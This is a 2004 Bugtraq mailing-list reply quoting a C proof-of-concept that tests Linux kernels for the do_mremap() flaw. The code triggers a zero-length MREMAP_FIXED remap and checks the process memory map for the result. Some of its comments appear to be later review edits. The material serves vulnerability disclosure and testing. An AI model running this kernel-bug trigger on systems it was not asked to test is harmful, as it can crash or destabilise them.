Message-ID: <1073502832.4770.1.camel@crazy>
Date: 07 Jan 2004 21:13:51 +0200
From: D Lambrou <dlambrou@...zylinux.net>
To: Angelo Dell'Aera <buffer@...ifork.org>
Cc: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: Re: Linux kernel do_mremap() proof-of-concept exploit code


This version works on Linux 2.4.21 sparc64 as well.

Nice, eh?

On Wed, 2004-01-07 at 17:26, Angelo Dell'Aera wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Mon, 5 Jan 2004 22:22:39 +0100
> Christophe Devine <devine@....cnam.fr> wrote:
> 
> >The following program can be used to test if a x86 Linux system
> >is vulnerable to the do_mremap() exploit; use at your own risk.
> 
> This is an improved version of Christophe's code which can be used
> to test the vulnerability without corrupting any kernel data, thus
> avoiding any kind of risk.
> 
> Regards.
> 
> 
> /*
>  * mremap_bug.c
>  * Creation date: 07.01.2004
>  * Copyright(c) 2004 Angelo Dell'Aera <buffer@...ifork.org>
>  * 
>  * This program is free software; you can redistribute it and/or modify
>  * it under the terms of the GNU General Public License as published by
>  * the Free Software Foundation; either version 2 of the License, or
>  * (at your option) any later version.
>  * 
>  * This program is distributed in the hope that it will be useful,
>  * but WITHOUT ANY WARRANTY; without even the implied warranty of
>  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
>  * GNU General Public License for more details.
>  * 
>  * You should have received a copy of the GNU General Public License
>  * along with this program; if not, write to the Free Software
>  * Foundation, Inc., 59 Temple Place, Suite 330, Boston,
>  * MA  02111-1307  USA
>  */
> 
> /* 
>  * Proof of concept code for testing do_mremap() Linux kernel bug.
>  * It is based on the code by Christophe Devine and Julien Tinnes
>  * posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since 
>  * it avoids any kernel data corruption.
>  *
>  * The following test was done against the Linux kernel 2.6.0. Similar 
>  * results were obtained against the kernel 2.4.23 and previous ones.
>  *
>  * buffer@...taka:~$ gcc -o mremap_bug mremap_bug.c
>  * buffer@...taka:~$ ./mremap_bug
>  *
>  * Base address : 0x60000000
>  * 
>  * 08048000-08049000 r-xp 00000000 03:03 2694       /home/buffer/mremap_bug
>  * 08049000-0804a000 rw-p 00000000 03:03 2694       /home/buffer/mremap_bug
>  * 40000000-40015000 r-xp 00000000 03:01 52619      /lib/ld-2.3.2.so
>  * 40015000-40016000 rw-p 00014000 03:01 52619      /lib/ld-2.3.2.so
>  * 40016000-40017000 rw-p 00000000 00:00 0
>  * 40022000-40151000 r-xp 00000000 03:01 52588      /lib/libc-2.3.2.so
>  * 40151000-40156000 rw-p 0012f000 03:01 52588      /lib/libc-2.3.2.so
>  * 40156000-40159000 rw-p 00000000 00:00 0
>  * 60000000-60002000 rw-p 00000000 00:00 0
>  * bfffd000-c0000000 rwxp ffffe000 00:00 0
>  * 
>  * Remapping at 0x70000000...
>  * 
>  * 08048000-08049000 r-xp 00000000 03:03 2694       /home/buffer/mremap_bug
>  * 08049000-0804a000 rw-p 00000000 03:03 2694       /home/buffer/mremap_bug
>  * 40000000-40015000 r-xp 00000000 03:01 52619      /lib/ld-2.3.2.so
>  * 40015000-40016000 rw-p 00014000 03:01 52619      /lib/ld-2.3.2.so
>  * 40016000-40017000 rw-p 00000000 00:00 0
>  * 40022000-40151000 r-xp 00000000 03:01 52588      /lib/libc-2.3.2.so
>  * 40151000-40156000 rw-p 0012f000 03:01 52588      /lib/libc-2.3.2.so
>  * 40156000-40159000 rw-p 00000000 00:00 0
>  * 60000000-60002000 rw-p 00000000 00:00 0
>  * 70000000-70000000 rw-p 00000000 00:00 0
>  * bfffd000-c0000000 rwxp ffffe000 00:00 0
>  * 
>  * Report :
>  * This kernel appears to be VULNERABLE
>  *
>  * Segmentation fault
>  * buffer@...taka:~$
>  */
> 
> #define _GNU_SOURCE
> 
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <sys/types.h>
> #include <sys/mman.h>
> #include <sys/stat.h>
> #include <asm/unistd.h>
> #include <errno.h>
>   
> /* Defined locally (presumably the libc headers of the time lacked it);
>  * 2 is the kernel's value for MREMAP_FIXED, "move to new_address". */
> #define MREMAP_FIXED    2
> 
> /* Page size is hard-coded rather than read via sysconf(_SC_PAGESIZE).
>  * VMASIZE is the size of the two-page anonymous mapping made in main(). */
> #define PAGESIZE 4096
> #define VMASIZE  (2*PAGESIZE)
> #define BUFSIZE  8192		/* read() chunk size used by read_maps() */
> 
> /* _syscall5() builds the syscall number from __NR_<name>, so the stub
>  * named real_mremap needs this alias to the real mremap number. */
> #define __NR_real_mremap __NR_mremap
> 
> /* Raw five-argument mremap syscall stub, bypassing the libc mremap()
>  * wrapper.  NOTE(review): the _syscallN macros are not shipped by newer
>  * kernel headers; syscall(__NR_mremap, ...) is the replacement there. */
> static inline _syscall5( void *, real_mremap, void *, old_address,
>                          size_t, old_size, size_t, new_size,
>                          unsigned long, flags, void *, new_address );
> 
> /* Values for the flag argument of read_maps(): whether each chunk of
>  * /proc/<pid>/maps is also scanned by maps_check(). */
> #define MAPS_NO_CHECK 0
> #define MAPS_CHECK    1
> 
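> /* Number of read() chunks of /proc/<pid>/maps in which maps_check() found
>  * the remap target address; main() reports VULNERABLE when nonzero. */
> int mremap_check = 0;
> 
> /*
>  * Scan one chunk of /proc/<pid>/maps for the address the test remaps to
>  * (0x70000000, see main()) and bump mremap_check on a hit.
>  *
>  * buf : NUL-terminated text chunk; NULL is ignored.  The caller must
>  *       terminate the buffer itself, since strstr() stops only at '\0'.
>  *
>  * strstr() needs <string.h>, which the original include list lacked.
>  */
> void maps_check(const char *buf)
> {
> 	if (buf == NULL)
> 		return;
> 
> 	if (strstr(buf, "70000000") != NULL)
> 		mremap_check++;
> }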
> 
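> /*
>  * Rewind fd (an open /proc/<pid>/maps) and copy its contents to stdout in
>  * BUFSIZE-1 byte chunks.  With MAPS_CHECK set in flag, every chunk is also
>  * handed to maps_check() so the remapped address can be detected.
>  *
>  * fd   : descriptor to dump; left open on return
>  * path : file name, used only in diagnostics
>  * flag : MAPS_NO_CHECK or MAPS_CHECK
>  *
>  * Returns early (with a message on stderr) if lseek() or read() fails;
>  * exits the process if stdout cannot be written, as the original did.
>  *
>  * NOTE(review): a match straddling two chunks would be missed.  The maps
>  * file of this small program (see the sample run above) is far smaller
>  * than one chunk, so in practice a single read() covers it — verify if
>  * BUFSIZE is ever reduced.
>  */
> void read_maps(int fd, const char *path, unsigned long flag)
> {
> 	char    buf[BUFSIZE];
> 	ssize_t nbytes;
> 
> 	if (lseek(fd, 0, SEEK_SET) < 0) {
> 		fprintf(stderr, "Unable to lseek %s\n", path);
> 		return;
> 	}
> 
> 	/* Read one byte less than the buffer so the chunk can be NUL-terminated:
> 	 * the original passed a raw read() buffer to strstr(), which reads past
> 	 * the data when no terminator is present. */
> 	while ((nbytes = read(fd, buf, BUFSIZE - 1)) != 0) {
> 		if (nbytes < 0) {
> 			if (errno == EINTR)
> 				continue;
> 			fprintf(stderr, "Unable to read %s\n", path);
> 			return;
> 		}
> 		buf[nbytes] = '\0';
> 
> 		if (flag & MAPS_CHECK)
> 			maps_check(buf);
> 
> 		/* A short write is treated as fatal, as before; the message now
> 		 * names the operation that actually failed. */
> 		if (write(STDOUT_FILENO, buf, (size_t)nbytes) != nbytes) {
> 			fprintf(stderr, "Unable to write %s to stdout\n", path);
> 			exit(1);
> 		}
> 	}
> }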
> 
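> /*
>  * Test driver: map two anonymous pages at 0x60000000, dump the process
>  * map, issue the zero-length MREMAP_FIXED move to 0x70000000 that the
>  * do_mremap() bug concerns, dump the map again and report VULNERABLE if
>  * the new address now appears in /proc/<pid>/maps.
>  *
>  * Returns 0 after printing the report, 1 if the maps file or the base
>  * mapping could not be set up.  The sample run in the header shows a
>  * segmentation fault on exit; it occurs after the report has been printed.
>  */
> int main(int argc, char **argv)
> {
> 	char   path[64];	/* "/proc/" + up to 20 digits + "/maps" + NUL */
> 	void  *base;
> 	void  *remapped;
> 	int    fd;
> 	int    n;
> 
> 	(void)argc;
> 	(void)argv;
> 
> 	/* The original sprintf() into a 16-byte array overflowed the stack for
> 	 * PIDs of five or more digits; bound the write and check it. */
> 	n = snprintf(path, sizeof path, "/proc/%ld/maps", (long)getpid());
> 	if (n < 0 || (size_t)n >= sizeof path) {
> 		fprintf(stderr, "Unable to build maps path\n");
> 		return 1;
> 	}
> 
> 	/* open() reports failure with -1, not 0; the original test
> 	 * "!(fd = open(...))" could never fire. */
> 	fd = open(path, O_RDONLY);
> 	if (fd < 0) {
> 		fprintf(stderr, "Unable to open %s\n", path);
> 		return 1;
> 	}
> 
> 	/* fd is -1 for MAP_ANONYMOUS, the portable form (the original passed 0,
> 	 * which Linux ignores for anonymous mappings). */
> 	base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
> 		    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
> 	if (base == MAP_FAILED) {
> 		perror("mmap");
> 		close(fd);
> 		return 1;
> 	}
> 
> 	/* %p: printing a pointer through %x is undefined behaviour. */
> 	printf("\nBase address : %p\n\n", base);
> 	read_maps(fd, path, MAPS_NO_CHECK);
> 
> 	printf("\nRemapping at 0x70000000...\n\n");
> 	/* The operation under test.  The verdict is taken from the maps file
> 	 * rather than from the return value, so the result is deliberately
> 	 * not interpreted here. */
> 	remapped = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
> 			       (void *)0x70000000);
> 	(void)remapped;
> 
> 	read_maps(fd, path, MAPS_CHECK);
> 
> 	printf("\nReport : \n");
> 	if (mremap_check)
> 		printf("This kernel appears to be VULNERABLE\n\n");
> 	else
> 		printf("This kernel appears to be NOT VULNERABLE\n\n");
> 
> 	/* The mappings are intentionally left for process teardown, as in the
> 	 * original; no munmap() of the possibly inconsistent VMA is attempted. */
> 	close(fd);
> 	return 0;
> }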
> 	
> 	
> 
> 
> 
> - --
> 
> Angelo Dell'Aera 'buffer' 
> Antifork Research, Inc.	  	http://buffer.antifork.org
> 
> PGP information in e-mail header
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
> 
> iD8DBQE//CUkpONIzxnBXKIRAoeMAJ9QruC6owY23yP9atS3LpDbxgioEACeIjeO
> Vl8MbPxJEbIrPb7iE47qVd0=
> =4Hue
> -----END PGP SIGNATURE-----
> ----
> 

> ----------------------------------------- (from cyetz)
> 
> E-Mail Disclaimer Notice:
> 
> 
> 
> This email is confidential and intended solely for the use of the individual to whom it is addressed.If you are not the intended recipient, be advised that you have received this email in error and that any use, dissemination, forwarding, printing, or copying of this email is strictly prohibited.
> 
> 
> ---------------------------------------------------------
-- 
---------------------------------------------------------
D Lambrou
http://crazylinux.net

You can always get my public key block from
http://crazylinux.net/public.asc
Fingerprint: C7B3 A112 3704 7202 2B33  6B28 5418 78DD 774A 7BCB


